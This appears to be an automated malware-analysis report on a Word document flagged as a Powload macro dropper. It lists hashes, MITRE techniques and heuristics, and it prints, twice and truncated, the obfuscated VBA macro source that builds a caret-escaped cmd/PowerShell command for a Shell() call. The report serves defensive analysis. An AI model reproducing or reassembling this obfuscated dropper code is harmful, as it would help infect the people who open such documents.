Office (OLE) malware analysis — malicious · 5e1f4107b44b3818

MALICIOUS

Office (OLE)

83.6 KB Created: 2018-08-29 15:14:00 Authoring application: Microsoft Office Word First seen: 2018-10-07

MD5: 1eb44e3443876bad0809088b734e53b2 SHA-1: 801d129f82ba13b1a64635cca798bd86bfc23c94 SHA-256: 5e1f4107b44b38183b61d8add19e9e5e9c74261c20f8cfafdafcfdbccfacb9da

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. A critical heuristic firing indicates the presence of a Shell() call within the VBA code, which is used to execute arbitrary commands. The ClamAV detection name 'Doc.Dropper.Powload-6666836-0' further suggests a dropper functionality, likely involving PowerShell execution.

Heuristics 6

ClamAV: Doc.Dropper.Powload-6666836-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Powload-6666836-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9905 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9905 bytes
SHA-256: `7944d4030b5acf5ab97b1c82dd636f929f969cb7d13b86931784772d09fb3ecc`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "HqZXCzBjYUosNZ" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "hzhBlkt" Function pZbRcqTzqDt() On _ Error _ Resume _ Next Hour KZplB * azmRaW / 4736 / SphwNh Hour 3081 / Fnhwp * 98538 * ZTvtWc Hour 79248 * cPOEr zZpcjWqV = "md " + "/" + "V^:^ON/" + "C" + Chr(0 + 2 + 0 + 3 + 29) + "^" + "s^e^" Hour 74518 * KZjHiq Hour 17765 * kzUlk Hour 9867 / GaIEpS / RtwLU * oEuSf Hour 60726 / iJhAQ SLpVhn = "t ^f" + "^M=A" + "^AC" + "^" + "A" Hour IdZUH * qlsio Hour tZTEZE * RWErQ / 60856 * FKzAs Hour pEENZ * LLiwKc itOQwVNTt = "^" + "g^A^AI^" + "AAC" + "A^g^A^" + "AI^A" + "^" + "ACA^g" + "A^A^I" + "^AAC^" + "A^gA" + "AI^A^AC" + "A" Hour 85309 * ZhEbwk Hour dwURzI * uHLwNJ Hour 37370 * ouUvG Hour 91834 * sKRsb / MaYrr / lOtlY wICXBF = "gAA^IA^" + "ACAg" + "^AQ^" + "fA^0" + "H^A^7^" + "BA^aA^" + "M^G^A" + "0" + "B^Q^Y^" + "AMGA9B" + "^" Hour duOjnC * 32315 / 59202 * OcrioR Hour 56526 / JrKGpv / dUwbXZ * coziM EajOXIHVVFO = "wO^A" + "s" + "G^AhBQZ" + "AI" + "HAi^B" + "w^O" + "^" + "A^4^G" + "A1^B" + "g^e^" + "A^QC^Ag" pZbRcqTzqDt = zZpcjWqV + SLpVhn + itOQwVNTt + wICXBF + EajOXIHVVFO Hour tZwii * jvfLYK * wdtoN * fYcZX Hour VzXIUT / PWimG Hour 87949 / Ttfiw / LONrj * tdQzaD Hour 33882 * Hkohs / OZrHH * HsHfww End Function Function juFKY() On _ Error _ Resume _ Next Hour 17892 * ksUlF * 65696 * 21906 Hour XWrFwz / vHiOcK * iuoiE / 18889 bQiAWDnz = "A" + "Qb" + "^" + "A^U^G" + "A0^B" + "Q^S^A0C" Hour OFHMbM * NwjUM Hour 31768 / vXndAb / SGIVzj / hFmVA Hour 23607 / cZhtz / hRfQYP / FKcBl Hour LHLid * RCJOv YjdTi = "Al^B^" + "wa^A" + "^" + "8G" + "A^2^" + "B^" + "g" + "bAk" + "^EA^7AQ" + "K" Hour XwaOfb * bvJOHM / jMJZwB * wuWCNV Hour zamWu * LvsRpz Hour 55050 / 15880 / 75326 * TPfHQ Hour wiPTUn * aWjocW GzYfmH = "^A4GA" + "^1^B^" + "geA^Q" + "CAg^AA^" + "L^" Hour 16018 / SOPvC Hour YEDMR / Yowbz / rEDlms * 15928 McZZSccJzOB = "A8^" + "GA^p^Bg" + "T^A^QCA" + "o^AQ^" + "Z^A^w" + "^GAp^B^" + "g" Hour 19232 * 28750 Hour 82833 * LYPOZ Hour ijBJz / OLuUXv pXIhAQmc = "R^" + "AQ^G^" + "Ah^Bwb" + "A^w" + "GA^u^" Hour 55671 / aUaiQF / 30301 * 40812 Hour 12269 / pzWDRh * 9900 / nPcqi Hour NWvQBS / nhMsd * BitVjw * hfrtU CYDlvsGprlD = "B" + "wd^A" + "8^G" + "A^E^" + "B^" + "gL^" + "AQ^FA^" + "a^BQ" Hour 43604 * JiqjQ Hour 45023 * jhBQW / 39003 / 67252 Hour 70768 / zirNQ / vjwVop / 82198 Hour iZEXjj / PNhiB / 92218 * 510 Hour IYTwSw / BiAIm / 9131 * aNPzZ EBKkn = "VAQ" + "CA^7B" + "^Q^e^A" + "^I^HA0B" + "weA^kC" + "^AB^B^w" Hour 85177 / qkKia Hour 88045 * 66826 Hour 81990 * YIZsR Hour CtXjwS / zcNNH aiIiaPwJjF = "V^A^Q^" + "E^AkAA" + "I^A" + "4G^" + "A" + "^p^BAIA" + "8^G^" + "Ap^B^" + "g^TAQ" Hour 35779 / MBJhF / Nfiiq / KikSn Hour pBFJI * rvZmD * RCjSf * lJjVJ Hour lUBbWv / YOhoH / OrZCUu / hwNmjR Hour oFVbGN * ifiUs / 14935 / oCqlsj DZXBVvP = "C^" + "A" + "^oA^A^a" + "^AMG^Ah" + "^" + "B^Q^" + "ZA" + "I^H" Hour 89824 / 62643 / oHATAZ / qObHTm ObcwPbsjjq = "^AvB" + "^" + "gZAsD" + "^AnA^QZ" + "A^g^H^A" + "^lB^g" + "^L^A" + "cCAr" + "^A" juFKY = bQiAWDnz + YjdTi + GzYfmH + McZZSccJzOB + pXIhAQmc + CYDlvsGprlD + EBKkn + aiIiaPwJjF + DZXBVvP + ObcwPbsjjq Hour oGOsF / 49793 Hour ZLQiX / 74257 Hour 44610 * fNadbj Hour 57259 * lzzdvq End Function Function wUdRSqs() On _ Error _ Resume _ Next Hour LffJBd / zjNzk / 69488 * wojtq Hour UizXBO / itLnkp / dlAEB / dUQLsH FpAcmiRcsJ = "g^dAU^F" + "AzB" + "AJ^AsCA" + "nA^A^" + "X" Hour fdjLD / CnGRzM * bbwRW * UFAcjK Hour afjUSz * mfujM CzThirVjkzE = "AcC^ArA" + "^wYA^k^" + "GAs^B" + "^g" + "Y^A" + "^U^H^Aw" + "Bg^" + "OAY^H^" + "A^u^" + "B" + "Q^Z^" + "A^QC^A" Hour 95436 * DAXwiJ DEWvjoYWn = "9" + "A^g" + "^bA" + "^UH^" + "A6^BA" Hour ERpmYP / ... (truncated)

SHA-256: 7944d4030b5acf5ab97b1c82dd636f929f969cb7d13b86931784772d09fb3ecc

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "HqZXCzBjYUosNZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "hzhBlkt"
Function pZbRcqTzqDt()

On _
Error _
Resume _
Next
Hour KZplB * azmRaW / 4736 / SphwNh
   Hour 3081 / Fnhwp * 98538 * ZTvtWc
   Hour 79248 * cPOEr
zZpcjWqV = "md " + "/" + "V^:^ON/" + "C" + Chr(0 + 2 + 0 + 3 + 29) + "^" + "s^e^"
Hour 74518 * KZjHiq
   Hour 17765 * kzUlk
   Hour 9867 / GaIEpS / RtwLU * oEuSf
   Hour 60726 / iJhAQ
SLpVhn = "t ^f" + "^M=A" + "^AC" + "^" + "A"
Hour IdZUH * qlsio
   Hour tZTEZE * RWErQ / 60856 * FKzAs
   Hour pEENZ * LLiwKc
itOQwVNTt = "^" + "g^A^AI^" + "AAC" + "A^g^A^" + "AI^A" + "^" + "ACA^g" + "A^A^I" + "^AAC^" + "A^gA" + "AI^A^AC" + "A"
Hour 85309 * ZhEbwk
   Hour dwURzI * uHLwNJ
   Hour 37370 * ouUvG
   Hour 91834 * sKRsb / MaYrr / lOtlY
wICXBF = "gAA^IA^" + "ACAg" + "^AQ^" + "fA^0" + "H^A^7^" + "BA^aA^" + "M^G^A" + "0" + "B^Q^Y^" + "AMGA9B" + "^"
Hour duOjnC * 32315 / 59202 * OcrioR
   Hour 56526 / JrKGpv / dUwbXZ * coziM
EajOXIHVVFO = "wO^A" + "s" + "G^AhBQZ" + "AI" + "HAi^B" + "w^O" + "^" + "A^4^G" + "A1^B" + "g^e^" + "A^QC^Ag"
pZbRcqTzqDt = zZpcjWqV + SLpVhn + itOQwVNTt + wICXBF + EajOXIHVVFO
   Hour tZwii * jvfLYK * wdtoN * fYcZX
   Hour VzXIUT / PWimG
   Hour 87949 / Ttfiw / LONrj * tdQzaD
   Hour 33882 * Hkohs / OZrHH * HsHfww
End Function
Function juFKY()

On _
Error _
Resume _
Next
Hour 17892 * ksUlF * 65696 * 21906
   Hour XWrFwz / vHiOcK * iuoiE / 18889
bQiAWDnz = "A" + "Qb" + "^" + "A^U^G" + "A0^B" + "Q^S^A0C"
Hour OFHMbM * NwjUM
   Hour 31768 / vXndAb / SGIVzj / hFmVA
   Hour 23607 / cZhtz / hRfQYP / FKcBl
   Hour LHLid * RCJOv
YjdTi = "Al^B^" + "wa^A" + "^" + "8G" + "A^2^" + "B^" + "g" + "bAk" + "^EA^7AQ" + "K"
Hour XwaOfb * bvJOHM / jMJZwB * wuWCNV
   Hour zamWu * LvsRpz
   Hour 55050 / 15880 / 75326 * TPfHQ
   Hour wiPTUn * aWjocW
GzYfmH = "^A4GA" + "^1^B^" + "geA^Q" + "CAg^AA^" + "L^"
Hour 16018 / SOPvC
   Hour YEDMR / Yowbz / rEDlms * 15928
McZZSccJzOB = "A8^" + "GA^p^Bg" + "T^A^QCA" + "o^AQ^" + "Z^A^w" + "^GAp^B^" + "g"
Hour 19232 * 28750
   Hour 82833 * LYPOZ
   Hour ijBJz / OLuUXv
pXIhAQmc = "R^" + "AQ^G^" + "Ah^Bwb" + "A^w" + "GA^u^"
Hour 55671 / aUaiQF / 30301 * 40812
   Hour 12269 / pzWDRh * 9900 / nPcqi
   Hour NWvQBS / nhMsd * BitVjw * hfrtU
CYDlvsGprlD = "B" + "wd^A" + "8^G" + "A^E^" + "B^" + "gL^" + "AQ^FA^" + "a^BQ"
Hour 43604 * JiqjQ
   Hour 45023 * jhBQW / 39003 / 67252
   Hour 70768 / zirNQ / vjwVop / 82198
   Hour iZEXjj / PNhiB / 92218 * 510
   Hour IYTwSw / BiAIm / 9131 * aNPzZ
EBKkn = "VAQ" + "CA^7B" + "^Q^e^A" + "^I^HA0B" + "weA^kC" + "^AB^B^w"
Hour 85177 / qkKia
   Hour 88045 * 66826
   Hour 81990 * YIZsR
   Hour CtXjwS / zcNNH
aiIiaPwJjF = "V^A^Q^" + "E^AkAA" + "I^A" + "4G^" + "A" + "^p^BAIA" + "8^G^" + "Ap^B^" + "g^TAQ"
Hour 35779 / MBJhF / Nfiiq / KikSn
   Hour pBFJI * rvZmD * RCjSf * lJjVJ
   Hour lUBbWv / YOhoH / OrZCUu / hwNmjR
   Hour oFVbGN * ifiUs / 14935 / oCqlsj
DZXBVvP = "C^" + "A" + "^oA^A^a" + "^AMG^Ah" + "^" + "B^Q^" + "ZA" + "I^H"
Hour 89824 / 62643 / oHATAZ / qObHTm
ObcwPbsjjq = "^AvB" + "^" + "gZAsD" + "^AnA^QZ" + "A^g^H^A" + "^lB^g" + "^L^A" + "cCAr" + "^A"
juFKY = bQiAWDnz + YjdTi + GzYfmH + McZZSccJzOB + pXIhAQmc + CYDlvsGprlD + EBKkn + aiIiaPwJjF + DZXBVvP + ObcwPbsjjq
   Hour oGOsF / 49793
   Hour ZLQiX / 74257
   Hour 44610 * fNadbj
   Hour 57259 * lzzdvq
End Function
Function wUdRSqs()

On _
Error _
Resume _
Next
Hour LffJBd / zjNzk / 69488 * wojtq
   Hour UizXBO / itLnkp / dlAEB / dUQLsH
FpAcmiRcsJ = "g^dAU^F" + "AzB" + "AJ^AsCA" + "nA^A^" + "X"
Hour fdjLD / CnGRzM * bbwRW * UFAcjK
   Hour afjUSz * mfujM
CzThirVjkzE = "AcC^ArA" + "^wYA^k^" + "GAs^B" + "^g" + "Y^A" + "^U^H^Aw" + "Bg^" + "OAY^H^" + "A^u^" + "B" + "Q^Z^" + "A^QC^A"
Hour 95436 * DAXwiJ
DEWvjoYWn = "9" + "A^g" + "^bA" + "^UH^" + "A6^BA"
Hour ERpmYP / 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.